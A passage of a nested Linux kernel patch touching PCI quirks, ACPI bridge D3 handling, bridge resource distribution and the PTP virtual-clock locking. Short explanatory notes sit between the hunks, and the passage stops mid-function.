++++ b/drivers/pci/controller/pci-loongson.c
+@@ -15,9 +15,14 @@
+ #include "../pci.h"
+ 
+ /* Device IDs */
+-#define DEV_PCIE_PORT_0	0x7a09
+-#define DEV_PCIE_PORT_1	0x7a19
+-#define DEV_PCIE_PORT_2	0x7a29
++#define DEV_LS2K_PCIE_PORT0	0x1a05
++#define DEV_LS7A_PCIE_PORT0	0x7a09
++#define DEV_LS7A_PCIE_PORT1	0x7a19
++#define DEV_LS7A_PCIE_PORT2	0x7a29
++#define DEV_LS7A_PCIE_PORT3	0x7a39
++#define DEV_LS7A_PCIE_PORT4	0x7a49
++#define DEV_LS7A_PCIE_PORT5	0x7a59
++#define DEV_LS7A_PCIE_PORT6	0x7a69
+ 
+ #define DEV_LS2K_APB	0x7a02
+ #define DEV_LS7A_GMAC	0x7a03
+@@ -53,11 +58,11 @@ static void bridge_class_quirk(struct pci_dev *dev)
+ 	dev->class = PCI_CLASS_BRIDGE_PCI_NORMAL;
+ }
+ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
+-			DEV_PCIE_PORT_0, bridge_class_quirk);
++			DEV_LS7A_PCIE_PORT0, bridge_class_quirk);
+ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
+-			DEV_PCIE_PORT_1, bridge_class_quirk);
++			DEV_LS7A_PCIE_PORT1, bridge_class_quirk);
+ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
+-			DEV_PCIE_PORT_2, bridge_class_quirk);
++			DEV_LS7A_PCIE_PORT2, bridge_class_quirk);
+ 
+ static void system_bus_quirk(struct pci_dev *pdev)
+ {
+@@ -75,37 +80,33 @@ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
+ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
+ 			DEV_LS7A_LPC, system_bus_quirk);
+ 
+-static void loongson_mrrs_quirk(struct pci_dev *dev)
++static void loongson_mrrs_quirk(struct pci_dev *pdev)
+ {
+-	struct pci_bus *bus = dev->bus;
+-	struct pci_dev *bridge;
+-	static const struct pci_device_id bridge_devids[] = {
+-		{ PCI_VDEVICE(LOONGSON, DEV_PCIE_PORT_0) },
+-		{ PCI_VDEVICE(LOONGSON, DEV_PCIE_PORT_1) },
+-		{ PCI_VDEVICE(LOONGSON, DEV_PCIE_PORT_2) },
+-		{ 0, },
+-	};
+-
+-	/* look for the matching bridge */
+-	while (!pci_is_root_bus(bus)) {
+-		bridge = bus->self;
+-		bus = bus->parent;
+-		/*
+-		 * Some Loongson PCIe ports have a h/w limitation of
+-		 * 256 bytes maximum read request size. They can't handle
+-		 * anything larger than this. So force this limit on
+-		 * any devices attached under these ports.
+-		 */
+-		if (pci_match_id(bridge_devids, bridge)) {
+-			if (pcie_get_readrq(dev) > 256) {
+-				pci_info(dev, "limiting MRRS to 256\n");
+-				pcie_set_readrq(dev, 256);
+-			}
+-			break;
+-		}
+-	}
++	/*
++	 * Some Loongson PCIe ports have a h/w limitation on the maximum
++	 * read request size; they can't handle anything larger. So force
++	 * this limit on any devices attached under these ports.
++	 */
++	struct pci_host_bridge *bridge = pci_find_host_bridge(pdev->bus);
++
++	bridge->no_inc_mrrs = 1;
+ }
+-DECLARE_PCI_FIXUP_ENABLE(PCI_ANY_ID, PCI_ANY_ID, loongson_mrrs_quirk);
++DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
++			DEV_LS2K_PCIE_PORT0, loongson_mrrs_quirk);
++DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
++			DEV_LS7A_PCIE_PORT0, loongson_mrrs_quirk);
++DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
++			DEV_LS7A_PCIE_PORT1, loongson_mrrs_quirk);
++DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
++			DEV_LS7A_PCIE_PORT2, loongson_mrrs_quirk);
++DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
++			DEV_LS7A_PCIE_PORT3, loongson_mrrs_quirk);
++DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
++			DEV_LS7A_PCIE_PORT4, loongson_mrrs_quirk);
++DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
++			DEV_LS7A_PCIE_PORT5, loongson_mrrs_quirk);
++DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
++			DEV_LS7A_PCIE_PORT6, loongson_mrrs_quirk);
+ 
+ static void loongson_pci_pin_quirk(struct pci_dev *pdev)
+ {
+diff --git a/drivers/pci/hotplug/pciehp_hpc.c b/drivers/pci/hotplug/pciehp_hpc.c
+index 040ae076ec0e9..112c8f401ac4e 100644
+--- a/drivers/pci/hotplug/pciehp_hpc.c
++++ b/drivers/pci/hotplug/pciehp_hpc.c
+@@ -1086,6 +1086,8 @@ static void quirk_cmd_compl(struct pci_dev *pdev)
+ }
+ DECLARE_PCI_FIXUP_CLASS_EARLY(PCI_VENDOR_ID_INTEL, PCI_ANY_ID,
+ 			      PCI_CLASS_BRIDGE_PCI, 8, quirk_cmd_compl);
++DECLARE_PCI_FIXUP_CLASS_EARLY(PCI_VENDOR_ID_QCOM, 0x010e,
++			      PCI_CLASS_BRIDGE_PCI, 8, quirk_cmd_compl);
+ DECLARE_PCI_FIXUP_CLASS_EARLY(PCI_VENDOR_ID_QCOM, 0x0110,
+ 			      PCI_CLASS_BRIDGE_PCI, 8, quirk_cmd_compl);
+ DECLARE_PCI_FIXUP_CLASS_EARLY(PCI_VENDOR_ID_QCOM, 0x0400,
+diff --git a/drivers/pci/pci-acpi.c b/drivers/pci/pci-acpi.c
+index a46fec776ad77..1698205dd73cb 100644
+--- a/drivers/pci/pci-acpi.c
++++ b/drivers/pci/pci-acpi.c
+@@ -976,24 +976,41 @@ bool acpi_pci_power_manageable(struct pci_dev *dev)
+ bool acpi_pci_bridge_d3(struct pci_dev *dev)
+ {
+ 	struct pci_dev *rpdev;
+-	struct acpi_device *adev;
+-	acpi_status status;
+-	unsigned long long state;
++	struct acpi_device *adev, *rpadev;
+ 	const union acpi_object *obj;
+ 
+ 	if (acpi_pci_disabled || !dev->is_hotplug_bridge)
+ 		return false;
+ 
+-	/* Assume D3 support if the bridge is power-manageable by ACPI. */
+-	if (acpi_pci_power_manageable(dev))
+-		return true;
++	adev = ACPI_COMPANION(&dev->dev);
++	if (adev) {
++		/*
++		 * If the bridge has _S0W, whether or not it can go into D3
++		 * depends on what is returned by that object.  In particular,
++		 * if the power state returned by _S0W is D2 or shallower,
++		 * entering D3 should not be allowed.
++		 */
++		if (acpi_dev_power_state_for_wake(adev) <= ACPI_STATE_D2)
++			return false;
++
++		/*
++		 * Otherwise, assume that the bridge can enter D3 so long as it
++		 * is power-manageable via ACPI.
++		 */
++		if (acpi_device_power_manageable(adev))
++			return true;
++	}
+ 
+ 	rpdev = pcie_find_root_port(dev);
+ 	if (!rpdev)
+ 		return false;
+ 
+-	adev = ACPI_COMPANION(&rpdev->dev);
+-	if (!adev)
++	if (rpdev == dev)
++		rpadev = adev;
++	else
++		rpadev = ACPI_COMPANION(&rpdev->dev);
++
++	if (!rpadev)
+ 		return false;
+ 
+ 	/*
+@@ -1001,15 +1018,15 @@ bool acpi_pci_bridge_d3(struct pci_dev *dev)
+ 	 * doesn't supply a wakeup GPE via _PRW, it cannot signal hotplug
+ 	 * events from low-power states including D3hot and D3cold.
+ 	 */
+-	if (!adev->wakeup.flags.valid)
++	if (!rpadev->wakeup.flags.valid)
+ 		return false;
+ 
+ 	/*
+-	 * If the Root Port cannot wake itself from D3hot or D3cold, we
+-	 * can't use D3.
++	 * In the bridge-below-a-Root-Port case, evaluate _S0W for the Root Port
++	 * to verify whether or not it can signal wakeup from D3.
+ 	 */
+-	status = acpi_evaluate_integer(adev->handle, "_S0W", NULL, &state);
+-	if (ACPI_SUCCESS(status) && state < ACPI_STATE_D3_HOT)
++	if (rpadev != adev &&
++	    acpi_dev_power_state_for_wake(rpadev) <= ACPI_STATE_D2)
+ 		return false;
+ 
+ 	/*
+@@ -1018,7 +1035,7 @@ bool acpi_pci_bridge_d3(struct pci_dev *dev)
+ 	 * bridges *below* that Root Port can also signal hotplug events
+ 	 * while in D3.
+ 	 */
+-	if (!acpi_dev_get_property(adev, "HotPlugSupportInD3",
++	if (!acpi_dev_get_property(rpadev, "HotPlugSupportInD3",
+ 				   ACPI_TYPE_INTEGER, &obj) &&
+ 	    obj->integer.value == 1)
+ 		return true;
+diff --git a/drivers/pci/pci.c b/drivers/pci/pci.c
+index c20e95fd48cee..98d841a7b45bb 100644
+--- a/drivers/pci/pci.c
++++ b/drivers/pci/pci.c
+@@ -6017,6 +6017,7 @@ int pcie_set_readrq(struct pci_dev *dev, int rq)
+ {
+ 	u16 v;
+ 	int ret;
++	struct pci_host_bridge *bridge = pci_find_host_bridge(dev->bus);
+ 
+ 	if (rq < 128 || rq > 4096 || !is_power_of_2(rq))
+ 		return -EINVAL;
+@@ -6035,6 +6036,15 @@ int pcie_set_readrq(struct pci_dev *dev, int rq)
+ 
+ 	v = (ffs(rq) - 8) << 12;
+ 
++	if (bridge->no_inc_mrrs) {
++		int max_mrrs = pcie_get_readrq(dev);
++
++		if (rq > max_mrrs) {
++			pci_info(dev, "can't set Max_Read_Request_Size to %d; max is %d\n", rq, max_mrrs);
++			return -EINVAL;
++		}
++	}
++
+ 	ret = pcie_capability_clear_and_set_word(dev, PCI_EXP_DEVCTL,
+ 						  PCI_EXP_DEVCTL_READRQ, v);
+ 
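
The MRRS clamp above sits next to the register encoding v = (ffs(rq) - 8) << 12: valid read request sizes are powers of two from 128 to 4096 bytes, and Device Control bits 14:12 store log2(size) - 7. A quick userspace check of that arithmetic:

    #include <assert.h>
    #include <strings.h>  /* ffs() */

    int main(void)
    {
            /* DEVCTL[14:12] = log2(rq) - 7: 0 for 128B up to 5 for 4096B */
            assert(((ffs(128) - 8) << 12) == (0 << 12));
            assert(((ffs(256) - 8) << 12) == (1 << 12));
            assert(((ffs(4096) - 8) << 12) == (5 << 12));
            return 0;
    }
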
+diff --git a/drivers/pci/quirks.c b/drivers/pci/quirks.c
+index 20ac67d590348..494fa46f57671 100644
+--- a/drivers/pci/quirks.c
++++ b/drivers/pci/quirks.c
+@@ -4835,6 +4835,26 @@ static int pci_quirk_brcm_acs(struct pci_dev *dev, u16 acs_flags)
+ 		PCI_ACS_SV | PCI_ACS_RR | PCI_ACS_CR | PCI_ACS_UF);
+ }
+ 
++/*
++ * Wangxun 10G/1G NICs have no ACS capability, and on multi-function
++ * devices, peer-to-peer transactions are not used between the functions.
++ * So add an ACS quirk for the devices below to isolate the functions:
++ * SFxxx 1G NICs (em),
++ * RP1000/RP2000 10G NICs (sp).
++ */
++static int pci_quirk_wangxun_nic_acs(struct pci_dev *dev, u16 acs_flags)
++{
++	switch (dev->device) {
++	case 0x0100 ... 0x010F:
++	case 0x1001:
++	case 0x2001:
++		return pci_acs_ctrl_enabled(acs_flags,
++			PCI_ACS_SV | PCI_ACS_RR | PCI_ACS_CR | PCI_ACS_UF);
++	}
++
++	return false;
++}
++
+ static const struct pci_dev_acs_enabled {
+ 	u16 vendor;
+ 	u16 device;
+@@ -4980,6 +5000,8 @@ static const struct pci_dev_acs_enabled {
+ 	{ PCI_VENDOR_ID_NXP, 0x8d9b, pci_quirk_nxp_rp_acs },
+ 	/* Zhaoxin Root/Downstream Ports */
+ 	{ PCI_VENDOR_ID_ZHAOXIN, PCI_ANY_ID, pci_quirk_zhaoxin_pcie_ports_acs },
++	/* Wangxun nics */
++	{ PCI_VENDOR_ID_WANGXUN, PCI_ANY_ID, pci_quirk_wangxun_nic_acs },
+ 	{ 0 }
+ };
+ 
+diff --git a/drivers/pci/setup-bus.c b/drivers/pci/setup-bus.c
+index b4096598dbcbb..c690572b10ce7 100644
+--- a/drivers/pci/setup-bus.c
++++ b/drivers/pci/setup-bus.c
+@@ -1765,12 +1765,70 @@ static void adjust_bridge_window(struct pci_dev *bridge, struct resource *res,
+ 		add_size = size - new_size;
+ 		pci_dbg(bridge, "bridge window %pR shrunken by %pa\n", res,
+ 			&add_size);
++	} else {
++		return;
+ 	}
+ 
+ 	res->end = res->start + new_size - 1;
+-	remove_from_list(add_list, res);
++
++	/* If the resource is part of the add_list, remove it now */
++	if (add_list)
++		remove_from_list(add_list, res);
++}
++
++static void remove_dev_resource(struct resource *avail, struct pci_dev *dev,
++				struct resource *res)
++{
++	resource_size_t size, align, tmp;
++
++	size = resource_size(res);
++	if (!size)
++		return;
++
++	align = pci_resource_alignment(dev, res);
++	align = align ? ALIGN(avail->start, align) - avail->start : 0;
++	tmp = align + size;
++	avail->start = min(avail->start + tmp, avail->end + 1);
++}
++
++static void remove_dev_resources(struct pci_dev *dev, struct resource *io,
++				 struct resource *mmio,
++				 struct resource *mmio_pref)
++{
++	int i;
++
++	for (i = 0; i < PCI_NUM_RESOURCES; i++) {
++		struct resource *res = &dev->resource[i];
++
++		if (resource_type(res) == IORESOURCE_IO) {
++			remove_dev_resource(io, dev, res);
++		} else if (resource_type(res) == IORESOURCE_MEM) {
++
++			/*
++			 * Make sure prefetchable memory is reduced from
++			 * the correct resource. Specifically, we put 32-bit
++			 * prefetchable memory in the non-prefetchable window
++			 * if there is a 64-bit prefetchable window.
++			 *
++			 * See comments in __pci_bus_size_bridges() for
++			 * more information.
++			 */
++			if ((res->flags & IORESOURCE_PREFETCH) &&
++			    ((res->flags & IORESOURCE_MEM_64) ==
++			     (mmio_pref->flags & IORESOURCE_MEM_64)))
++				remove_dev_resource(mmio_pref, dev, res);
++			else
++				remove_dev_resource(mmio, dev, res);
++		}
++	}
+ }
+ 
++/*
++ * io, mmio and mmio_pref contain the total amount of bridge window space
++ * available. This includes the minimal space needed to cover all the
++ * existing devices on the bus and the possible extra space that can be
++ * shared with the bridges.
++ */
+ static void pci_bus_distribute_available_resources(struct pci_bus *bus,
+ 					    struct list_head *add_list,
+ 					    struct resource io,
+@@ -1780,7 +1838,7 @@ static void pci_bus_distribute_available_resources(struct pci_bus *bus,
+ 	unsigned int normal_bridges = 0, hotplug_bridges = 0;
+ 	struct resource *io_res, *mmio_res, *mmio_pref_res;
+ 	struct pci_dev *dev, *bridge = bus->self;
+-	resource_size_t io_per_hp, mmio_per_hp, mmio_pref_per_hp, align;
++	resource_size_t io_per_b, mmio_per_b, mmio_pref_per_b, align;
+ 
+ 	io_res = &bridge->resource[PCI_BRIDGE_IO_WINDOW];
+ 	mmio_res = &bridge->resource[PCI_BRIDGE_MEM_WINDOW];
+@@ -1824,94 +1882,88 @@ static void pci_bus_distribute_available_resources(struct pci_bus *bus,
+ 			normal_bridges++;
+ 	}
+ 
++	if (!(hotplug_bridges + normal_bridges))
++		return;
++
+ 	/*
+-	 * There is only one bridge on the bus so it gets all available
+-	 * resources which it can then distribute to the possible hotplug
+-	 * bridges below.
++	 * Calculate the amount of space we can forward from "bus" to any
++	 * downstream buses, i.e., the space left over after assigning the
++	 * BARs and windows on "bus".
+ 	 */
+-	if (hotplug_bridges + normal_bridges == 1) {
+-		dev = list_first_entry(&bus->devices, struct pci_dev, bus_list);
+-		if (dev->subordinate)
+-			pci_bus_distribute_available_resources(dev->subordinate,
+-				add_list, io, mmio, mmio_pref);
+-		return;
++	list_for_each_entry(dev, &bus->devices, bus_list) {
++		if (!dev->is_virtfn)
++			remove_dev_resources(dev, &io, &mmio, &mmio_pref);
+ 	}
+ 
+-	if (hotplug_bridges == 0)
+-		return;
+-
+ 	/*
+-	 * Calculate the total amount of extra resource space we can
+-	 * pass to bridges below this one.  This is basically the
+-	 * extra space reduced by the minimal required space for the
+-	 * non-hotplug bridges.
++	 * If there is at least one hotplug bridge on this bus, the hotplug
++	 * bridges get all the extra resource space that was left after the
++	 * reductions above.
++	 *
++	 * If there are no hotplug bridges, the extra resource space is
++	 * split between the non-hotplug bridges, so that possible hotplug
++	 * bridges below them can get the extra space as well.
+ 	 */
++	if (hotplug_bridges) {
++		io_per_b = div64_ul(resource_size(&io), hotplug_bridges);
++		mmio_per_b = div64_ul(resource_size(&mmio), hotplug_bridges);
++		mmio_pref_per_b = div64_ul(resource_size(&mmio_pref),
++					   hotplug_bridges);
++	} else {
++		io_per_b = div64_ul(resource_size(&io), normal_bridges);
++		mmio_per_b = div64_ul(resource_size(&mmio), normal_bridges);
++		mmio_pref_per_b = div64_ul(resource_size(&mmio_pref),
++					   normal_bridges);
++	}
++
+ 	for_each_pci_bridge(dev, bus) {
+-		resource_size_t used_size;
+ 		struct resource *res;
++		struct pci_bus *b;
+ 
+-		if (dev->is_hotplug_bridge)
++		b = dev->subordinate;
++		if (!b)
++			continue;
++		if (hotplug_bridges && !dev->is_hotplug_bridge)
+ 			continue;
+ 
++		res = &dev->resource[PCI_BRIDGE_IO_WINDOW];
++
+ 		/*
+-		 * Reduce the available resource space by what the
+-		 * bridge and devices below it occupy.
++		 * Make sure the split resource space is properly aligned
++		 * for bridge windows (align it down to avoid going above
++		 * what is available).
+ 		 */
+-		res = &dev->resource[PCI_BRIDGE_IO_WINDOW];
+ 		align = pci_resource_alignment(dev, res);
+-		align = align ? ALIGN(io.start, align) - io.start : 0;
+-		used_size = align + resource_size(res);
+-		if (!res->parent)
+-			io.start = min(io.start + used_size, io.end + 1);
++		io.end = align ? io.start + ALIGN_DOWN(io_per_b, align) - 1
++			       : io.start + io_per_b - 1;
++
++		/*
++		 * The x_per_b values hold the extra resource space that can
++		 * be added for each bridge, but the minimal required space is
++		 * already reserved as well, so adjust x.start down accordingly
++		 * to cover the whole space.
++		 */
++		io.start -= resource_size(res);
+ 
+ 		res = &dev->resource[PCI_BRIDGE_MEM_WINDOW];
+ 		align = pci_resource_alignment(dev, res);
+-		align = align ? ALIGN(mmio.start, align) - mmio.start : 0;
+-		used_size = align + resource_size(res);
+-		if (!res->parent)
+-			mmio.start = min(mmio.start + used_size, mmio.end + 1);
++		mmio.end = align ? mmio.start + ALIGN_DOWN(mmio_per_b, align) - 1
++				 : mmio.start + mmio_per_b - 1;
++		mmio.start -= resource_size(res);
+ 
+ 		res = &dev->resource[PCI_BRIDGE_PREF_MEM_WINDOW];
+ 		align = pci_resource_alignment(dev, res);
+-		align = align ? ALIGN(mmio_pref.start, align) -
+-			mmio_pref.start : 0;
+-		used_size = align + resource_size(res);
+-		if (!res->parent)
+-			mmio_pref.start = min(mmio_pref.start + used_size,
+-				mmio_pref.end + 1);
+-	}
+-
+-	io_per_hp = div64_ul(resource_size(&io), hotplug_bridges);
+-	mmio_per_hp = div64_ul(resource_size(&mmio), hotplug_bridges);
+-	mmio_pref_per_hp = div64_ul(resource_size(&mmio_pref),
+-		hotplug_bridges);
+-
+-	/*
+-	 * Go over devices on this bus and distribute the remaining
+-	 * resource space between hotplug bridges.
+-	 */
+-	for_each_pci_bridge(dev, bus) {
+-		struct pci_bus *b;
+-
+-		b = dev->subordinate;
+-		if (!b || !dev->is_hotplug_bridge)
+-			continue;
+-
+-		/*
+-		 * Distribute available extra resources equally between
+-		 * hotplug-capable downstream ports taking alignment into
+-		 * account.
+-		 */
+-		io.end = io.start + io_per_hp - 1;
+-		mmio.end = mmio.start + mmio_per_hp - 1;
+-		mmio_pref.end = mmio_pref.start + mmio_pref_per_hp - 1;
++		mmio_pref.end = align ? mmio_pref.start +
++					ALIGN_DOWN(mmio_pref_per_b, align) - 1
++				      : mmio_pref.start + mmio_pref_per_b - 1;
++		mmio_pref.start -= resource_size(res);
+ 
+ 		pci_bus_distribute_available_resources(b, add_list, io, mmio,
+ 						       mmio_pref);
+ 
+-		io.start += io_per_hp;
+-		mmio.start += mmio_per_hp;
+-		mmio_pref.start += mmio_pref_per_hp;
++		io.start += io.end + 1;
++		mmio.start += mmio.end + 1;
++		mmio_pref.start += mmio_pref.end + 1;
+ 	}
+ }
+ 
+@@ -1923,6 +1975,8 @@ static void pci_bridge_distribute_available_resources(struct pci_dev *bridge,
+ 	if (!bridge->is_hotplug_bridge)
+ 		return;
+ 
++	pci_dbg(bridge, "distributing available resources\n");
++
+ 	/* Take the initial extra resources from the hotplug port */
+ 	available_io = bridge->resource[PCI_BRIDGE_IO_WINDOW];
+ 	available_mmio = bridge->resource[PCI_BRIDGE_MEM_WINDOW];
+@@ -1934,6 +1988,54 @@ static void pci_bridge_distribute_available_resources(struct pci_dev *bridge,
+ 					       available_mmio_pref);
+ }
+ 
++static bool pci_bridge_resources_not_assigned(struct pci_dev *dev)
++{
++	const struct resource *r;
++
++	/*
++	 * If the child device's resources are not yet assigned, it means we
++	 * are configuring them (not the boot firmware), so we should be
++	 * able to extend the upstream bridge resources in the same way we
++	 * do with the normal hotplug case.
++	 */
++	r = &dev->resource[PCI_BRIDGE_IO_WINDOW];
++	if (r->flags && !(r->flags & IORESOURCE_STARTALIGN))
++		return false;
++	r = &dev->resource[PCI_BRIDGE_MEM_WINDOW];
++	if (r->flags && !(r->flags & IORESOURCE_STARTALIGN))
++		return false;
++	r = &dev->resource[PCI_BRIDGE_PREF_MEM_WINDOW];
++	if (r->flags && !(r->flags & IORESOURCE_STARTALIGN))
++		return false;
++
++	return true;
++}
++
++static void
++pci_root_bus_distribute_available_resources(struct pci_bus *bus,
++					    struct list_head *add_list)
++{
++	struct pci_dev *dev, *bridge = bus->self;
++
++	for_each_pci_bridge(dev, bus) {
++		struct pci_bus *b;
++
++		b = dev->subordinate;
++		if (!b)
++			continue;
++
++		/*
++		 * Need to check "bridge" here too because it is NULL
++		 * in the case of the root bus.
++		 */
++		if (bridge && pci_bridge_resources_not_assigned(dev))
++			pci_bridge_distribute_available_resources(bridge,
++								  add_list);
++		else
++			pci_root_bus_distribute_available_resources(b, add_list);
++	}
++}
++
+ /*
+  * First try will not touch PCI bridge res.
+  * Second and later try will clear small leaf bridge res.
+@@ -1973,6 +2075,8 @@ again:
+ 	 */
+ 	__pci_bus_size_bridges(bus, add_list);
+ 
++	pci_root_bus_distribute_available_resources(bus, add_list);
++
+ 	/* Depth last, allocate resources and update the hardware. */
+ 	__pci_bus_assign_resources(bus, add_list, &fail_head);
+ 	if (add_list)
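
The rewritten distribution loop above divides the leftover window space evenly across the eligible bridges and aligns each share down so the shares can never overrun the parent window. The split for one resource type, reduced to a sketch (the helper names are the kernel's, the wrapper is illustrative):

    /* Split 'avail' bytes across n bridges; align each share down so the
     * n shares together cannot exceed the parent bridge window. */
    static u64 per_bridge_share(u64 avail, unsigned int n, u64 align)
    {
            u64 share = div64_ul(avail, n);

            return align ? ALIGN_DOWN(share, align) : share;
    }
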
+diff --git a/drivers/phy/rockchip/phy-rockchip-typec.c b/drivers/phy/rockchip/phy-rockchip-typec.c
+index 6aea512e5d4ee..39db8acde61af 100644
+--- a/drivers/phy/rockchip/phy-rockchip-typec.c
++++ b/drivers/phy/rockchip/phy-rockchip-typec.c
+@@ -808,9 +808,8 @@ static int tcphy_get_mode(struct rockchip_typec_phy *tcphy)
+ 	struct extcon_dev *edev = tcphy->extcon;
+ 	union extcon_property_value property;
+ 	unsigned int id;
+-	bool ufp, dp;
+ 	u8 mode;
+-	int ret;
++	int ret, ufp, dp;
+ 
+ 	if (!edev)
+ 		return MODE_DFP_USB;
+diff --git a/drivers/ptp/ptp_private.h b/drivers/ptp/ptp_private.h
+index 77918a2c67018..75f58fc468a71 100644
+--- a/drivers/ptp/ptp_private.h
++++ b/drivers/ptp/ptp_private.h
+@@ -66,7 +66,7 @@ struct ptp_vclock {
+ 	struct hlist_node vclock_hash_node;
+ 	struct cyclecounter cc;
+ 	struct timecounter tc;
+-	spinlock_t lock;	/* protects tc/cc */
++	struct mutex lock;	/* protects tc/cc */
+ };
+ 
+ /*
+diff --git a/drivers/ptp/ptp_vclock.c b/drivers/ptp/ptp_vclock.c
+index 1c0ed4805c0aa..dcf752c9e0450 100644
+--- a/drivers/ptp/ptp_vclock.c
++++ b/drivers/ptp/ptp_vclock.c
+@@ -43,16 +43,16 @@ static void ptp_vclock_hash_del(struct ptp_vclock *vclock)
+ static int ptp_vclock_adjfine(struct ptp_clock_info *ptp, long scaled_ppm)
+ {
+ 	struct ptp_vclock *vclock = info_to_vclock(ptp);
+-	unsigned long flags;
+ 	s64 adj;
+ 
+ 	adj = (s64)scaled_ppm << PTP_VCLOCK_FADJ_SHIFT;
+ 	adj = div_s64(adj, PTP_VCLOCK_FADJ_DENOMINATOR);
+ 
+-	spin_lock_irqsave(&vclock->lock, flags);
++	if (mutex_lock_interruptible(&vclock->lock))
++		return -EINTR;
+ 	timecounter_read(&vclock->tc);
+ 	vclock->cc.mult = PTP_VCLOCK_CC_MULT + adj;
+-	spin_unlock_irqrestore(&vclock->lock, flags);
++	mutex_unlock(&vclock->lock);
+ 
+ 	return 0;
+ }
+@@ -60,11 +60,11 @@ static int ptp_vclock_adjfine(struct ptp_clock_info *ptp, long scaled_ppm)
+ static int ptp_vclock_adjtime(struct ptp_clock_info *ptp, s64 delta)
+ {
+ 	struct ptp_vclock *vclock = info_to_vclock(ptp);
+-	unsigned long flags;
+ 
+-	spin_lock_irqsave(&vclock->lock, flags);
++	if (mutex_lock_interruptible(&vclock->lock))
++		return -EINTR;
+ 	timecounter_adjtime(&vclock->tc, delta);
+-	spin_unlock_irqrestore(&vclock->lock, flags);
++	mutex_unlock(&vclock->lock);
+ 
+ 	return 0;
+ }
+@@ -73,12 +73,12 @@ static int ptp_vclock_gettime(struct ptp_clock_info *ptp,
+ 			      struct timespec64 *ts)
+ {
+ 	struct ptp_vclock *vclock = info_to_vclock(ptp);
+-	unsigned long flags;
+ 	u64 ns;
+ 
+-	spin_lock_irqsave(&vclock->lock, flags);
++	if (mutex_lock_interruptible(&vclock->lock))
++		return -EINTR;
+ 	ns = timecounter_read(&vclock->tc);
+-	spin_unlock_irqrestore(&vclock->lock, flags);
++	mutex_unlock(&vclock->lock);
+ 	*ts = ns_to_timespec64(ns);
+ 
+ 	return 0;
+@@ -91,7 +91,6 @@ static int ptp_vclock_gettimex(struct ptp_clock_info *ptp,
+ 	struct ptp_vclock *vclock = info_to_vclock(ptp);
+ 	struct ptp_clock *pptp = vclock->pclock;
+ 	struct timespec64 pts;
+-	unsigned long flags;
+ 	int err;
+ 	u64 ns;
+ 
+@@ -99,9 +98,10 @@ static int ptp_vclock_gettimex(struct ptp_clock_info *ptp,
+ 	if (err)
+ 		return err;
+ 
+-	spin_lock_irqsave(&vclock->lock, flags);
++	if (mutex_lock_interruptible(&vclock->lock))
++		return -EINTR;
+ 	ns = timecounter_cyc2time(&vclock->tc, timespec64_to_ns(&pts));
+-	spin_unlock_irqrestore(&vclock->lock, flags);
++	mutex_unlock(&vclock->lock);
+ 
+ 	*ts = ns_to_timespec64(ns);
+ 
+@@ -113,11 +113,11 @@ static int ptp_vclock_settime(struct ptp_clock_info *ptp,
+ {
+ 	struct ptp_vclock *vclock = info_to_vclock(ptp);
+ 	u64 ns = timespec64_to_ns(ts);
+-	unsigned long flags;
+ 
+-	spin_lock_irqsave(&vclock->lock, flags);
++	if (mutex_lock_interruptible(&vclock->lock))
++		return -EINTR;
+ 	timecounter_init(&vclock->tc, &vclock->cc, ns);
+-	spin_unlock_irqrestore(&vclock->lock, flags);
++	mutex_unlock(&vclock->lock);
+ 
+ 	return 0;
+ }
+@@ -127,7 +127,6 @@ static int ptp_vclock_getcrosststamp(struct ptp_clock_info *ptp,
+ {
+ 	struct ptp_vclock *vclock = info_to_vclock(ptp);
+ 	struct ptp_clock *pptp = vclock->pclock;
+-	unsigned long flags;
+ 	int err;
+ 	u64 ns;
+ 
+@@ -135,9 +134,10 @@ static int ptp_vclock_getcrosststamp(struct ptp_clock_info *ptp,
+ 	if (err)
+ 		return err;
+ 
+-	spin_lock_irqsave(&vclock->lock, flags);
++	if (mutex_lock_interruptible(&vclock->lock))
++		return -EINTR;
+ 	ns = timecounter_cyc2time(&vclock->tc, ktime_to_ns(xtstamp->device));
+-	spin_unlock_irqrestore(&vclock->lock, flags);
++	mutex_unlock(&vclock->lock);
+ 
+ 	xtstamp->device = ns_to_ktime(ns);
+ 
+@@ -205,7 +205,7 @@ struct ptp_vclock *ptp_vclock_register(struct ptp_clock *pclock)
+ 
+ 	INIT_HLIST_NODE(&vclock->vclock_hash_node);
+ 
+-	spin_lock_init(&vclock->lock);
++	mutex_init(&vclock->lock);
+ 
+ 	vclock->clock = ptp_clock_register(&vclock->info, &pclock->dev);
+ 	if (IS_ERR_OR_NULL(vclock->clock)) {
+@@ -269,7 +269,6 @@ ktime_t ptp_convert_timestamp(const ktime_t *hwtstamp, int vclock_index)
+ {
+ 	unsigned int hash = vclock_index % HASH_SIZE(vclock_hash);
+ 	struct ptp_vclock *vclock;
+-	unsigned long flags;
+ 	u64 ns;
+ 	u64 vclock_ns = 0;
+ 
+@@ -281,9 +280,10 @@ ktime_t ptp_convert_timestamp(const ktime_t *hwtstamp, int vclock_index)
+ 		if (vclock->clock->index != vclock_index)
+ 			continue;
+ 
+-		spin_lock_irqsave(&vclock->lock, flags);
++		if (mutex_lock_interruptible(&vclock->lock))
++			break;
+ 		vclock_ns = timecounter_cyc2time(&vclock->tc, ns);
+-		spin_unlock_irqrestore(&vclock->lock, flags);
++		mutex_unlock(&vclock->lock);
+ 		break;
+ 	}
+ 
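
The ptp_vclock lock conversion trades a spinlock for a mutex, presumably because the timecounter's cyclecounter read path ends up in the parent PTP driver and may sleep; taking the mutex interruptibly additionally lets a signal abort the wait with -EINTR instead of blocking the caller. The resulting pattern in isolation (a sketch, not the full driver):

    static int vclock_read_ns(struct ptp_vclock *vclock, u64 *ns)
    {
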